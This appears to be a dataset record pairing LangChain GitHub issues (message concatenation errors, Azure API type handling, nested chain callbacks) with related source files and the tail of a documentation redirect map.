"/docs/modules/model_io/models/llms/integrations/huggingface_hub", "destination": "/docs/integrations/llms/huggingface_hub" }, { "source": "/en/latest/modules/models/llms/integrations/huggingface_pipelines.html", "destination": "/docs/integrations/llms/huggingface_pipelines" }, { "source": "/docs/modules/model_io/models/llms/integrations/huggingface_pipelines", "destination": "/docs/integrations/llms/huggingface_pipelines" }, { "source": "/en/latest/modules/models/llms/integrations/huggingface_textgen_inference.html", "destination": "/docs/integrations/llms/huggingface_textgen_inference" }, { "source": "/docs/modules/model_io/models/llms/integrations/huggingface_textgen_inference", "destination": "/docs/integrations/llms/huggingface_textgen_inference" }, { "source": "/en/latest/modules/models/llms/integrations/jsonformer_experimental.html", "destination": "/docs/integrations/llms/jsonformer_experimental" }, { "source": "/docs/modules/model_io/models/llms/integrations/jsonformer_experimental", "destination": "/docs/integrations/llms/jsonformer_experimental" }, { "source": "/en/latest/modules/models/llms/integrations/llamacpp.html", "destination": "/docs/integrations/llms/llamacpp" }, { "source": "/docs/modules/model_io/models/llms/integrations/llamacpp", "destination": "/docs/integrations/llms/llamacpp" }, { "source": "/en/latest/modules/models/llms/examples/llm_caching.html", "destination": "/docs/integrations/llms/llm_caching" }, { "source": "/docs/modules/model_io/models/llms/integrations/llm_caching", "destination": "/docs/integrations/llms/llm_caching" }, { "source": "/en/latest/modules/models/llms/integrations/manifest.html", "destination": "/docs/integrations/llms/manifest" }, { "source": "/docs/modules/model_io/models/llms/integrations/manifest", "destination": "/docs/integrations/llms/manifest" }, { "source": "/en/latest/modules/models/llms/integrations/modal.html", "destination": "/docs/integrations/llms/modal" }, { "source": "/docs/modules/model_io/models/llms/integrations/modal", "destination": "/docs/integrations/llms/modal" }, { "source": "/en/latest/modules/models/llms/integrations/mosaicml.html", "destination": "/docs/integrations/llms/mosaicml" }, { "source": "/docs/modules/model_io/models/llms/integrations/mosaicml", "destination": "/docs/integrations/llms/mosaicml" }, { "source": "/en/latest/modules/models/llms/integrations/nlpcloud.html", "destination": "/docs/integrations/llms/nlpcloud" }, { "source": "/docs/modules/model_io/models/llms/integrations/nlpcloud", "destination": "/docs/integrations/llms/nlpcloud" }, { "source": "/en/latest/modules/models/llms/integrations/openai.html", "destination": "/docs/integrations/llms/openai" }, { "source": "/docs/modules/model_io/models/llms/integrations/openai", "destination": "/docs/integrations/llms/openai" }, { "source": "/en/latest/modules/models/llms/integrations/openlm.html", "destination": "/docs/integrations/llms/openlm" }, { "source": "/docs/modules/model_io/models/llms/integrations/openlm", "destination": "/docs/integrations/llms/openlm" }, { "source": "/en/latest/modules/models/llms/integrations/petals_example.html", "destination": "/docs/integrations/llms/petals_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/petals_example", "destination": "/docs/integrations/llms/petals_example" }, { "source": "/en/latest/modules/models/llms/integrations/pipelineai_example.html", "destination": "/docs/integrations/llms/pipelineai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/pipelineai_example", "destination": "/docs/integrations/llms/pipelineai_example" }, { "source": "/en/latest/modules/models/llms/integrations/predictionguard.html", "destination": "/docs/integrations/llms/predictionguard" }, { "source": "/docs/modules/model_io/models/llms/integrations/predictionguard", "destination": "/docs/integrations/llms/predictionguard" }, { "source": "/en/latest/modules/models/llms/integrations/promptlayer_openai.html", "destination": "/docs/integrations/llms/promptlayer_openai" }, { "source": "/docs/modules/model_io/models/llms/integrations/promptlayer_openai", "destination": "/docs/integrations/llms/promptlayer_openai" }, { "source": "/en/latest/modules/models/llms/integrations/rellm_experimental.html", "destination": "/docs/integrations/llms/rellm_experimental" }, { "source": "/docs/modules/model_io/models/llms/integrations/rellm_experimental", "destination": "/docs/integrations/llms/rellm_experimental" }, { "source": "/en/latest/modules/models/llms/integrations/replicate.html", "destination": "/docs/integrations/llms/replicate" }, { "source": "/docs/modules/model_io/models/llms/integrations/replicate", "destination": "/docs/integrations/llms/replicate" }, { "source": "/en/latest/modules/models/llms/integrations/runhouse.html", "destination": "/docs/integrations/llms/runhouse" }, { "source": "/docs/modules/model_io/models/llms/integrations/runhouse", "destination": "/docs/integrations/llms/runhouse" }, { "source": "/en/latest/modules/models/llms/integrations/sagemaker.html", "destination": "/docs/integrations/llms/sagemaker" }, { "source": "/docs/modules/model_io/models/llms/integrations/sagemaker", "destination": "/docs/integrations/llms/sagemaker" }, { "source": "/en/latest/modules/models/llms/integrations/stochasticai.html", "destination": "/docs/integrations/llms/stochasticai" }, { "source": "/docs/modules/model_io/models/llms/integrations/stochasticai", "destination": "/docs/integrations/llms/stochasticai" }, { "source": "/en/latest/modules/models/llms/integrations/writer.html", "destination": "/docs/integrations/llms/writer" }, { "source": "/docs/modules/model_io/models/llms/integrations/writer", "destination": "/docs/integrations/llms/writer" }, { "source": "/en/latest/modules/prompts.html", "destination": "/docs/modules/model_io/prompts" }, { "source": "/en/latest/modules/prompts/output_parsers.html", "destination": "/docs/modules/model_io/output_parsers/" }, { "source": "/docs/modules/prompts/output_parsers.html", "destination": "/docs/modules/model_io/output_parsers/" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/datetime.html", "destination": "/docs/modules/model_io/output_parsers/datetime" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/enum.html", "destination": "/docs/modules/model_io/output_parsers/enum" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/pydantic.html", "destination": "/docs/modules/model_io/output_parsers/pydantic" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/retry.html", "destination": "/docs/modules/model_io/output_parsers/retry" }, { "source": "/en/latest/modules/prompts/example_selectors/examples/custom_example_selector.html", "destination": "/docs/modules/model_io/prompts/example_selectors/custom_example_selector" }, { "source": "/en/latest/modules/prompts/example_selectors/examples/mmr.html", "destination": "/docs/modules/model_io/prompts/example_selectors/mmr" }, { "source": "/en/latest/modules/prompts/example_selectors/examples/ngram_overlap.html", "destination": "/docs/modules/model_io/prompts/example_selectors/ngram_overlap" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/connecting_to_a_feature_store.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/connecting_to_a_feature_store" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/custom_prompt_template.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/custom_prompt_template" }, { "source": "/en/latest/modules/models/chat/examples/few_shot_examples.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/few_shot_examples_chat" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/prompt_serialization.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/prompt_serialization" }, { "source": "/en/latest/use_cases/agent_simulations/camel_role_playing.html", "destination": "/docs/use_cases/agent_simulations/camel_role_playing" }, { "source": "/en/latest/use_cases/agent_simulations/characters.html", "destination": "/docs/use_cases/agent_simulations/characters" }, { "source": "/en/latest/use_cases/agent_simulations/gymnasium.html", "destination": "/docs/use_cases/agent_simulations/gymnasium" }, { "source": "/en/latest/use_cases/agent_simulations/multi_player_dnd.html", "destination": "/docs/use_cases/agent_simulations/multi_player_dnd" }, { "source": "/en/latest/use_cases/agent_simulations/multiagent_authoritarian.html", "destination": "/docs/use_cases/agent_simulations/multiagent_authoritarian" }, { "source": "/en/latest/use_cases/agent_simulations/multiagent_bidding.html", "destination": "/docs/use_cases/agent_simulations/multiagent_bidding" }, { "source": "/en/latest/use_cases/agent_simulations/petting_zoo.html", "destination": "/docs/use_cases/agent_simulations/petting_zoo" }, { "source": "/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html", "destination": "/docs/use_cases/agent_simulations/two_agent_debate_tools" }, { "source": "/en/latest/use_cases/agent_simulations/two_player_dnd.html", "destination": "/docs/use_cases/agent_simulations/two_player_dnd" }, { "source": "/en/latest/use_cases/agents/baby_agi.html", "destination": "/docs/use_cases/agents/baby_agi" }, { "source": "/en/latest/use_cases/agents/baby_agi_with_agent.html", "destination": "/docs/use_cases/agents/baby_agi_with_agent" }, { "source": "/en/latest/use_cases/agents/camel_role_playing.html", "destination": "/docs/use_cases/agents/camel_role_playing" }, { "source": "/en/latest/use_cases/agents/custom_agent_with_plugin_retrieval.html", "destination": "/docs/use_cases/agents/custom_agent_with_plugin_retrieval" }, { "source": "/en/latest/use_cases/agents/custom_agent_with_plugin_retrieval_using_plugnplai.html", "destination": "/docs/use_cases/agents/custom_agent_with_plugin_retrieval_using_plugnplai" }, { "source": "/en/latest/use_cases/agents/multi_modal_output_agent.html", "destination": "/docs/use_cases/agents/multi_modal_output_agent" }, { "source": "/en/latest/use_cases/agents/sales_agent_with_context.html", "destination": "/docs/use_cases/agents/sales_agent_with_context" }, { "source": "/en/latest/use_cases/agents/wikibase_agent.html", "destination": "/docs/use_cases/agents/wikibase_agent" }, { "source": "/en/latest/use_cases/apis.html", "destination": "/docs/use_cases/apis" }, { "source": "/en/latest/use_cases/autonomous_agents/autogpt.html", "destination": "/docs/use_cases/autonomous_agents/autogpt" }, { "source": "/en/latest/use_cases/autonomous_agents/baby_agi.html", "destination": "/docs/use_cases/autonomous_agents/baby_agi" }, { "source": "/en/latest/use_cases/autonomous_agents/baby_agi_with_agent.html", "destination": "/docs/use_cases/autonomous_agents/baby_agi_with_agent" }, { "source": "/en/latest/use_cases/autonomous_agents/marathon_times.html", "destination": "/docs/use_cases/autonomous_agents/marathon_times" }, { "source": "/en/latest/use_cases/autonomous_agents/meta_prompt.html", "destination": "/docs/use_cases/autonomous_agents/meta_prompt" }, { "source": "/en/latest/use_cases/chatbots/voice_assistant.html", "destination": "/docs/use_cases/chatbots/voice_assistant" }, { "source": "/en/latest/use_cases/code/code-analysis-deeplake.html", "destination": "/docs/use_cases/code/code-analysis-deeplake" }, { "source": "/en/latest/use_cases/code/twitter-the-algorithm-analysis-deeplake.html", "destination": "/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake" }, { "source": "/en/latest/use_cases/extraction.html", "destination": "/docs/use_cases/extraction" }, { "source": "/en/latest/use_cases/multi_modal/image_agent.html", "destination": "/docs/use_cases/multi_modal/image_agent" }, { "source": "/en/latest/use_cases/question_answering/semantic-search-over-chat.html", "destination": "/docs/use_cases/question_answering/semantic-search-over-chat" }, { "source": "/en/latest/use_cases/summarization.html", "destination": "/docs/use_cases/summarization" }, { "source": "/en/latest/use_cases/tabular.html", "destination": "/docs/use_cases/tabular" }, { "source": "/en/latest/youtube.html", "destination": "/docs/additional_resources/youtube" }, { "source": "/en/latest/modules/agents/agents/wikibase_agent.html", "destination": "/docs/use_cases/agents/wikibase_agent" }, { "source": "/en/latest/modules/indexes/retrievers/examples/twitter-the-algorithm-analysis-deeplake.html", "destination": "/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake" }, { "source": "/en/latest/explanation/tools.html", "destination": "/docs/modules/agents/tools" }, { "source": "/docs", "destination": "/" }, { "source": "/docs/", "destination": "/" }, { "source": "/en/latest", "destination": "/" }, { "source": "/en/latest/", "destination": "/" }, { "source": "/en/latest/index.html", "destination": "/" }, { "source": "/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/" }, { "source": "/en/latest/modules/indexes/retrievers/examples/:path*", "destination": "/docs/integrations/retrievers/:path*" }, { "source": "/docs/modules/data_connection/retrievers/integrations/:path*", "destination": "/docs/integrations/retrievers/:path*" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/:path*", "destination": "/docs/integrations/vectorstores/:path*" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/:path*", "destination": "/docs/integrations/vectorstores/:path*" }, { "source": "/docs/modules/agents/tools/how_to/:path*", "destination": "/docs/modules/agents/tools/:path*" }, { "source": "/docs/modules/callbacks/how_to/:path*", "destination": "/docs/modules/callbacks/:path*" }, { "source": "/docs/modules/data_connection/document_loaders/how_to/:path*", "destination": "/docs/modules/data_connection/document_loaders/:path*" }, { "source": "/docs/modules/data_connection/retrievers/how_to/:path*", "destination": "/docs/modules/data_connection/retrievers/:path*" }, { "source": "/docs/modules/memory/how_to/:path*", "destination": "/docs/modules/memory/:path*" }, { "source": "/docs/modules/model_io/models/chat/how_to/:path*", "destination": "/docs/modules/model_io/models/chat/:path*" }, { "source": "/docs/modules/model_io/models/llms/how_to/:path*", "destination": "/docs/modules/model_io/models/llms/:path*" }, { "source": "/docs/modules/callbacks/integrations/:path*", "destination": "/docs/integrations/callbacks/:path*" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/:path*", "destination": "/docs/integrations/document_loaders/:path*" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/:path*", "destination": "/docs/integrations/text_embedding/:path*" }, { "source": "/docs/modules/model_io/models/llms/integrations/:path*", "destination": "/docs/integrations/llms/:path*" }, { "source": "/docs/modules/model_io/models/chat/integrations/:path*", "destination": "/docs/integrations/chat/:path*" }, { "source": "/docs/modules/evaluation(/?)", "destination": "/docs/guides/evaluation" }, { "source": "/docs/modules/evaluation/:path*(/?)", "destination": "/docs/guides/evaluation/:path*" }, { "source": "/en/latest/modules/indexes/:path*", "destination": "/docs/modules/data_connection/:path*" }, { "source": "/en/latest/modules/memory/types/:path*", "destination": "/docs/modules/memory/how_to/:path*" }, { "source": "/en/latest/modules/models.html", "destination": "/docs/modules/model_io/models/" }, { "source": "/en/latest/modules/models/:path*", "destination": "/docs/modules/model_io/models/:path*" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/:path*", "destination": "/docs/modules/model_io/prompts/prompt_templates/:path*" }, { "source": "/en/latest/modules/prompts/:path1*/examples/:path*", "destination": "/docs/modules/model_io/prompts/:path1*/:path*" }, { "source": "/en/latest/reference.html", "destination": "https://api.python.langchain.com" }, { "source": "/en/latest/reference/:path*", "destination": "https://api.python.langchain.com/en/latest/:path*" }, { "source": "/en/latest/:path*", "destination": "/docs/:path*" }, { "source": "/docs/modules/chains/additional/constitutional_chain", "destination": "/docs/guides/safety/constitutional_chain" }, { "source": "/docs/modules/chains/additional/moderation", "destination": "/docs/guides/safety/moderation" }, { "source": "/docs/modules/chains/popular/api", "destination": "/docs/use_cases/apis/api" }, { "source": "/docs/modules/chains/additional/analyze_document", "destination": "/docs/use_cases/question_answering/how_to/analyze_document" }, { "source": "/docs/modules/chains/popular/chat_vector_db", "destination": "/docs/use_cases/question_answering/how_to/chat_vector_db" }, { "source": "/docs/modules/chains/additional/multi_retrieval_qa_router", "destination": "/docs/use_cases/question_answering/how_to/multi_retrieval_qa_router" }, { "source": "/docs/modules/chains/additional/question_answering", "destination": "/docs/use_cases/question_answering/how_to/question_answering" }, { "source": "/docs/modules/chains/popular/vector_db_qa", "destination": "/docs/use_cases/question_answering/how_to/vector_db_qa" }, { "source": "/docs/modules/chains/popular/summarize", "destination": "/docs/use_cases/summarization/summarize" }, { "source": "/docs/modules/chains/popular/sqlite", "destination": "/docs/use_cases/tabular/sqlite" }, { "source": "/docs/modules/chains/popular/openai_functions", "destination": "/docs/modules/chains/how_to/openai_functions" }, { "source": "/docs/modules/chains/additional/llm_requests", "destination": "/docs/use_cases/apis/llm_requests" }, { "source": "/docs/modules/chains/additional/openai_openapi", "destination": "/docs/use_cases/apis/openai_openapi" }, { "source": "/docs/modules/chains/additional/openapi", "destination": "/docs/use_cases/apis/openapi" }, { "source": "/docs/modules/chains/additional/openapi_openai", "destination": "/docs/use_cases/apis/openapi_openai" }, { "source": "/docs/modules/chains/additional/cpal", "destination": "/docs/use_cases/code_writing/cpal" }, { "source": "/docs/modules/chains/additional/llm_bash", "destination": "/docs/use_cases/code_writing/llm_bash" }, { "source": "/docs/modules/chains/additional/llm_math", "destination": "/docs/use_cases/code_writing/llm_math" }, { "source": "/docs/modules/chains/additional/llm_symbolic_math", "destination": "/docs/use_cases/code_writing/llm_symbolic_math" }, { "source": "/docs/modules/chains/additional/pal", "destination": "/docs/use_cases/code_writing/pal" }, { "source": "/docs/modules/chains/additional/graph_arangodb_qa", "destination": "/docs/use_cases/graph/graph_arangodb_qa" }, { "source": "/docs/modules/chains/additional/graph_cypher_qa", "destination": "/docs/use_cases/graph/graph_cypher_qa" }, { "source": "/docs/modules/chains/additional/graph_hugegraph_qa", "destination": "/docs/use_cases/graph/graph_hugegraph_qa" }, { "source": "/docs/modules/chains/additional/graph_kuzu_qa", "destination": "/docs/use_cases/graph/graph_kuzu_qa" }, { "source": "/docs/modules/chains/additional/graph_nebula_qa", "destination": "/docs/use_cases/graph/graph_nebula_qa" }, { "source": "/docs/modules/chains/additional/graph_qa", "destination": "/docs/use_cases/graph/graph_qa" }, { "source": "/docs/modules/chains/additional/graph_sparql_qa", "destination": "/docs/use_cases/graph/graph_sparql_qa" }, { "source": "/docs/modules/chains/additional/neptune_cypher_qa", "destination": "/docs/use_cases/graph/neptune_cypher_qa" }, { "source": "/docs/modules/chains/additional/tot", "destination": "/docs/use_cases/graph/tot" }, { "source": "/docs/use_cases/question_answering//document-context-aware-QA", "destination": "/docs/use_cases/question_answering/how_to/document-context-aware-QA" }, { "source": "/docs/modules/chains/additional/flare", "destination": "/docs/use_cases/question_answering/how_to/flare" }, { "source": "/docs/modules/chains/additional/hyde", "destination": "/docs/use_cases/question_answering/how_to/hyde" }, { "source": "/docs/use_cases/question_answering//local_retrieval_qa", "destination": "/docs/use_cases/question_answering/how_to/local_retrieval_qa" }, { "source": "/docs/modules/chains/additional/qa_citations", "destination": "/docs/use_cases/question_answering/how_to/qa_citations" }, { "source": "/docs/modules/chains/additional/vector_db_text_generation", "destination": "/docs/use_cases/question_answering/how_to/vector_db_text_generation" }, { "source": "/docs/modules/chains/additional/openai_functions_retrieval_qa", "destination": "/docs/use_cases/question_answering/integrations/openai_functions_retrieval_qa" }, { "source": "/docs/use_cases/question_answering//semantic-search-over-chat", "destination": "/docs/use_cases/question_answering/integrations/semantic-search-over-chat" }, { "source": "/docs/modules/chains/additional/llm_checker", "destination": "/docs/use_cases/self_check/llm_checker" }, { "source": "/docs/modules/chains/additional/llm_summarization_checker", "destination": "/docs/use_cases/self_check/llm_summarization_checker" }, { "source": "/docs/modules/chains/additional/elasticsearch_database", "destination": "/docs/use_cases/tabular/elasticsearch_database" }, { "source": "/docs/modules/chains/additional/tagging", "destination": "/docs/use_cases/tagging" } ] }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,472
unsupported operand type(s) for +: 'SystemMessage' and 'HumanMessage'
### System Info Langchain version: 0.0.247 python version: 3.11.0 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction You can reproduce this issue according following link: https://python.langchain.com/docs/modules/model_io/prompts/prompt_templates/prompts_pipelining ``` from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate from langchain.schema import HumanMessage, AIMessage, SystemMessage prompt = SystemMessage(content="You are a nice pirate") new_prompt = ( prompt + HumanMessage(content="hi") + AIMessage(content="what?") + "{input}" ) ``` prompy + HumanMessage(content="hi") will generate this issue ### Expected behavior operand + for 'SystemMessage' and 'HumanMessage' should be support
https://github.com/langchain-ai/langchain/issues/8472
https://github.com/langchain-ai/langchain/pull/8489
f31047a3941cd389a9b8c01446b097e3bfbb1235
1ec0b1837971bc58c54645c4ca515dc201788a82
"2023-07-30T02:14:01Z"
python
"2023-08-02T14:51:44Z"
libs/langchain/langchain/schema/messages.py
from __future__ import annotations from abc import abstractmethod from typing import Any, Dict, List, Sequence from pydantic import Field from langchain.load.serializable import Serializable def get_buffer_string( messages: Sequence[BaseMessage], human_prefix: str = "Human", ai_prefix: str = "AI" ) -> str: """Convert sequence of Messages to strings and concatenate them into one string. Args: messages: Messages to be converted to strings. human_prefix: The prefix to prepend to contents of HumanMessages. ai_prefix: THe prefix to prepend to contents of AIMessages. Returns: A single string concatenation of all input messages. Example: .. code-block:: python from langchain.schema import AIMessage, HumanMessage messages = [ HumanMessage(content="Hi, how are you?"), AIMessage(content="Good, how are you?"), ] get_buffer_string(messages) # -> "Human: Hi, how are you?\nAI: Good, how are you?" """ string_messages = [] for m in messages: if isinstance(m, HumanMessage): role = human_prefix elif isinstance(m, AIMessage): role = ai_prefix elif isinstance(m, SystemMessage): role = "System" elif isinstance(m, FunctionMessage): role = "Function" elif isinstance(m, ChatMessage): role = m.role else: raise ValueError(f"Got unsupported message type: {m}") message = f"{role}: {m.content}" if isinstance(m, AIMessage) and "function_call" in m.additional_kwargs: message += f"{m.additional_kwargs['function_call']}" string_messages.append(message) return "\n".join(string_messages) class BaseMessage(Serializable): """The base abstract Message class. Messages are the inputs and outputs of ChatModels. """ content: str """The string contents of the message.""" additional_kwargs: dict = Field(default_factory=dict) """Any additional information.""" @property @abstractmethod def type(self) -> str: """Type of the Message, used for serialization.""" @property def lc_serializable(self) -> bool: """Whether this class is LangChain serializable.""" return True class BaseMessageChunk(BaseMessage): def _merge_kwargs_dict( self, left: Dict[str, Any], right: Dict[str, Any] ) -> Dict[str, Any]: """Merge additional_kwargs from another BaseMessageChunk into this one.""" merged = left.copy() for k, v in right.items(): if k not in merged: merged[k] = v elif type(merged[k]) != type(v): raise ValueError( f'additional_kwargs["{k}"] already exists in this message,' " but with a different type." ) elif isinstance(merged[k], str): merged[k] += v elif isinstance(merged[k], dict): merged[k] = self._merge_kwargs_dict(merged[k], v) else: raise ValueError( f"Additional kwargs key {k} already exists in this message." ) return merged def __add__(self, other: Any) -> BaseMessageChunk: if isinstance(other, BaseMessageChunk): # If both are (subclasses of) BaseMessageChunk, # concat into a single BaseMessageChunk return self.__class__( content=self.content + other.content, additional_kwargs=self._merge_kwargs_dict( self.additional_kwargs, other.additional_kwargs ), ) else: raise TypeError( 'unsupported operand type(s) for +: "' f"{self.__class__.__name__}" f'" and "{other.__class__.__name__}"' ) class HumanMessage(BaseMessage): """A Message from a human.""" example: bool = False """Whether this Message is being passed in to the model as part of an example conversation. """ @property def type(self) -> str: """Type of the message, used for serialization.""" return "human" class HumanMessageChunk(HumanMessage, BaseMessageChunk): pass class AIMessage(BaseMessage): """A Message from an AI.""" example: bool = False """Whether this Message is being passed in to the model as part of an example conversation. """ @property def type(self) -> str: """Type of the message, used for serialization.""" return "ai" class AIMessageChunk(AIMessage, BaseMessageChunk): pass class SystemMessage(BaseMessage): """A Message for priming AI behavior, usually passed in as the first of a sequence of input messages. """ @property def type(self) -> str: """Type of the message, used for serialization.""" return "system" class SystemMessageChunk(SystemMessage, BaseMessageChunk): pass class FunctionMessage(BaseMessage): """A Message for passing the result of executing a function back to a model.""" name: str """The name of the function that was executed.""" @property def type(self) -> str: """Type of the message, used for serialization.""" return "function" class FunctionMessageChunk(FunctionMessage, BaseMessageChunk): pass class ChatMessage(BaseMessage): """A Message that can be assigned an arbitrary speaker (i.e. role).""" role: str """The speaker / role of the Message.""" @property def type(self) -> str: """Type of the message, used for serialization.""" return "chat" class ChatMessageChunk(ChatMessage, BaseMessageChunk): pass def _message_to_dict(message: BaseMessage) -> dict: return {"type": message.type, "data": message.dict()} def messages_to_dict(messages: Sequence[BaseMessage]) -> List[dict]: """Convert a sequence of Messages to a list of dictionaries. Args: messages: Sequence of messages (as BaseMessages) to convert. Returns: List of messages as dicts. """ return [_message_to_dict(m) for m in messages] def _message_from_dict(message: dict) -> BaseMessage: _type = message["type"] if _type == "human": return HumanMessage(**message["data"]) elif _type == "ai": return AIMessage(**message["data"]) elif _type == "system": return SystemMessage(**message["data"]) elif _type == "chat": return ChatMessage(**message["data"]) elif _type == "function": return FunctionMessage(**message["data"]) else: raise ValueError(f"Got unexpected message type: {_type}") def messages_from_dict(messages: List[dict]) -> List[BaseMessage]: """Convert a sequence of messages from dicts to Message objects. Args: messages: Sequence of messages (as dicts) to convert. Returns: List of messages (BaseMessages). """ return [_message_from_dict(m) for m in messages]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,650
[AzureChatOpenAI] openai_api_type can't be changed from the default 'azure' value
### System Info Hello, during the development of an application that needs to authenticate to Azure services and use the wrapper [AzureChatOpenAi](https://github.com/hwchase17/langchain/blob/master/langchain/chat_models/azure_openai.py), we encountered an error due to the fact that the model could not use the 'azure_ad' type. It seems that this class sets the openai_api_type always to the set default value of 'azure' even if we have an environment variable called 'OPENAI_API_TYPE' specifying 'azure_ad'. Why is it so? ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction answering_llm=AzureChatOpenAI( deployment_name=ANSWERING_MODEL_CONFIG.model_name, model_name=ANSWERING_MODEL_CONFIG.model_type, #"gpt-3.5-turbo" openai_api_type="azure_ad", # IF THIS IS NOT EXPLICITLY PASSED IT FAILS openai_api_key=auth_token, temperature=ANSWERING_MODEL_CONFIG.temperature, max_tokens=ANSWERING_MODEL_CONFIG.max_tokens ) ### Expected behavior We expect the wrapper to take the value of the environmental variable correctly.
https://github.com/langchain-ai/langchain/issues/6650
https://github.com/langchain-ai/langchain/pull/8622
29f51055e8f7d060e6d3a5480591bef76652edae
e68a1d73d0c84503702a2bf66b52d7ae2336eb67
"2023-06-23T14:09:47Z"
python
"2023-08-04T03:21:41Z"
libs/langchain/langchain/chat_models/azure_openai.py
"""Azure OpenAI chat wrapper.""" from __future__ import annotations import logging from typing import Any, Dict, Mapping from pydantic import root_validator from langchain.chat_models.openai import ChatOpenAI from langchain.schema import ChatResult from langchain.utils import get_from_dict_or_env logger = logging.getLogger(__name__) class AzureChatOpenAI(ChatOpenAI): """Wrapper around Azure OpenAI Chat Completion API. To use this class you must have a deployed model on Azure OpenAI. Use `deployment_name` in the constructor to refer to the "Model deployment name" in the Azure portal. In addition, you should have the ``openai`` python package installed, and the following environment variables set or passed in constructor in lower case: - ``OPENAI_API_TYPE`` (default: ``azure``) - ``OPENAI_API_KEY`` - ``OPENAI_API_BASE`` - ``OPENAI_API_VERSION`` - ``OPENAI_PROXY`` For example, if you have `gpt-35-turbo` deployed, with the deployment name `35-turbo-dev`, the constructor should look like: .. code-block:: python AzureChatOpenAI( deployment_name="35-turbo-dev", openai_api_version="2023-05-15", ) Be aware the API version may change. Any parameters that are valid to be passed to the openai.create call can be passed in, even if not explicitly saved on this class. """ deployment_name: str = "" openai_api_type: str = "azure" openai_api_base: str = "" openai_api_version: str = "" openai_api_key: str = "" openai_organization: str = "" openai_proxy: str = "" @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY", ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", ) values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) try: values["client"] = openai.ChatCompletion except AttributeError: raise ValueError( "`openai` has no `ChatCompletion` attribute, this is likely " "due to an old version of the openai package. Try upgrading it " "with `pip install --upgrade openai`." ) if values["n"] < 1: raise ValueError("n must be at least 1.") if values["n"] > 1 and values["streaming"]: raise ValueError("n must be 1 when streaming.") return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling OpenAI API.""" return { **super()._default_params, "engine": self.deployment_name, } @property def _identifying_params(self) -> Dict[str, Any]: """Get the identifying parameters.""" return {**self._default_params} @property def _client_params(self) -> Dict[str, Any]: """Get the config params used for the openai client.""" return { **super()._client_params, "api_type": self.openai_api_type, "api_version": self.openai_api_version, } @property def _llm_type(self) -> str: return "azure-openai-chat" def _create_chat_result(self, response: Mapping[str, Any]) -> ChatResult: for res in response["choices"]: if res.get("finish_reason", None) == "content_filter": raise ValueError( "Azure has not provided the response due to a content" " filter being triggered" ) return super()._create_chat_result(response)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,786
RetrievalQA.from_chain_type: callbacks are not called for all nested chains
### System Info langchain: 0.0.252 python: 3.10.12 @agola11 ### Who can help? @agola11 please take a look, ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction 1. Create a callback handler LogHandler for on_chain_start, on_chain_start, on_chat_model_start and log run_id, parent_run_id in each of them 2. Create a retrival chain and add this LogHandler 3. Add this LogHandler to llm as well 4. When running the chain, one of nested chain is not logged in between, because callbacks are not passed to that chain ### Expected behavior All the nested chains should have callbacks defined.
https://github.com/langchain-ai/langchain/issues/8786
https://github.com/langchain-ai/langchain/pull/8787
5f1aab548731b53ebab00dd745a35ec7da52bf1c
797c9e92c82f8e843b321ec2167bb1678ced03cf
"2023-08-05T06:43:10Z"
python
"2023-08-06T22:11:45Z"
libs/langchain/langchain/chains/question_answering/__init__.py
